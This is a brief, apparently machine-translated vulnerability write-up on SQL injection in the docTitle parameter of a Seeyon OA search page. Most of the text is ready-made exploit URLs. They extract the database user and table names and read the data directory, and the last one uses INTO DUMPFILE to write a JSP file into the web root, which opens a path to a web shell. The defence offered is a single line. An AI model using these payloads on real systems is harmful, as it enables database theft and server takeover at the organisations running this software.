Inject the docTitle parameter in the search_result.jsp File
Http://xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = 1' and/**/1 = 2/**/union/**/all/**/select/**/user (), 2, 3, 4, 5% 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc
Query Table Name:
Http: // xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = test' and/**/1 = 2/**/union/**/all/**/select/**/group_concat (table_name), 2, 3, 4, 5/**/from/**/information_schema.tables % 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc
Because the program is integrated with the default installation, you can guess the WEB path:
Http://xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = test' and/**/1 = 2/**/union/**/all/**/select/**/@ datadir, 2, 3, 4, 5% 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc
Based on the OA installation path information found on the Internet, the following WEB path is spliced:
D: \ UFseeyon \ OA \ tomcat \ webapps \ yyoa
Direct dumpfile file:
Http://xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = test' and/**/1 = 2/**/union/**/all/**/select/**/'test ', 2, 3, 4, 5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test. jsp '/**/from/**/mysql. user/**/limit/**/1% 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc
Solution:
Filter dangerous characters